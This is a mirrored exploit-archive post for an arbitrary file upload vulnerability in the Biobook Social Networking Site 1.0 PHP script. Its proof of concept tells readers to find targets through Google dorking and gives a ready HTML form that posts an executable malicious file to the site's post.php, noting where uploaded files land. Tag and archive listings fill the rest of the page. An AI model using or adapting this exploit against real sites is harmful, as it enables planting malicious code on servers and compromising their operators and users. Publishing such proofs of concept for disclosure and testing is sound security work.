2024-8-20 22:48:12 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏
- Biobook Social Networking Site 1.0 Arbitrary File Upload
- Posted Aug 20, 2024
- Authored by indoushka
Biobook Social Networking Site version 1.0 suffers from an arbitrary file upload vulnerability.
- tags | exploit, arbitrary, file upload
- SHA-256 |
eea7a63452086fbc6b26395926afd32c8db7ed26cb64e63041d07be948f52e93 - Download | Favorite | View
=============================================================================================================================================
| # Title : biobook Social Networking Site 1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip |
=============================================================================================================================================poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Go to the line 7.
[+] Set the target site link Save changes and apply .
[+] save code as poc.html .
<div id="right-nav">
<h1>Update Status</h1>
<div>
<form method="post" action="http://127.0.0.1/social/post.php" enctype="multipart/form-data">
<textarea placeholder="Whats on your mind?" name="content" class="post-text" required=""></textarea>
<input type="file" name="image">
<button class="btn-share" name="Submit" value="Log out">Share</button>
</form>
</div>
</div>
[+] http://127.0.0.1/social/upload/
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
File Tags
- ActiveX (933)
- Advisory (86,478)
- Arbitrary (16,888)
- BBS (2,859)
- Bypass (1,867)
- CGI (1,034)
- Code Execution (7,825)
- Conference (691)
- Cracker (844)
- CSRF (3,401)
- DoS (25,095)
- Encryption (2,389)
- Exploit (53,242)
- File Inclusion (4,263)
- File Upload (997)
- Firewall (822)
- Info Disclosure (2,891)
- Intrusion Detection (916)
- Java (3,144)
- JavaScript (899)
- Kernel (7,225)
- Local (14,800)
- Magazine (587)
- Overflow (13,172)
- Perl (1,435)
- PHP (5,225)
- Proof of Concept (2,394)
- Protocol (3,727)
- Python (1,646)
- Remote (31,674)
- Root (3,638)
- Rootkit (527)
- Ruby (632)
- Scanner (1,657)
- Security Tool (8,029)
- Shell (3,277)
- Shellcode (1,217)
- Sniffer (902)
- Spoof (2,278)
- SQL Injection (16,614)
- TCP (2,441)
- Trojan (690)
- UDP (904)
- Virus (670)
- Vulnerability (33,006)
- Web (9,968)
- Whitepaper (3,782)
- x86 (967)
- XSS (18,260)
- Other
File Archives
Systems
- AIX (429)
- Apple (2,099)
- BSD (377)
- CentOS (58)
- Cisco (1,927)
- Debian (7,102)
- Fedora (1,693)
- FreeBSD (1,246)
- Gentoo (4,567)
- HPUX (880)
- iOS (378)
- iPhone (108)
- IRIX (220)
- Juniper (69)
- Linux (50,834)
- Mac OS X (691)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (489)
- RedHat (16,581)
- Slackware (941)
- Solaris (1,611)
- SUSE (1,444)
- Ubuntu (9,760)
- UNIX (9,439)
- UnixWare (187)
- Windows (6,674)
- Other
如有侵权请联系:admin#unsafe.sh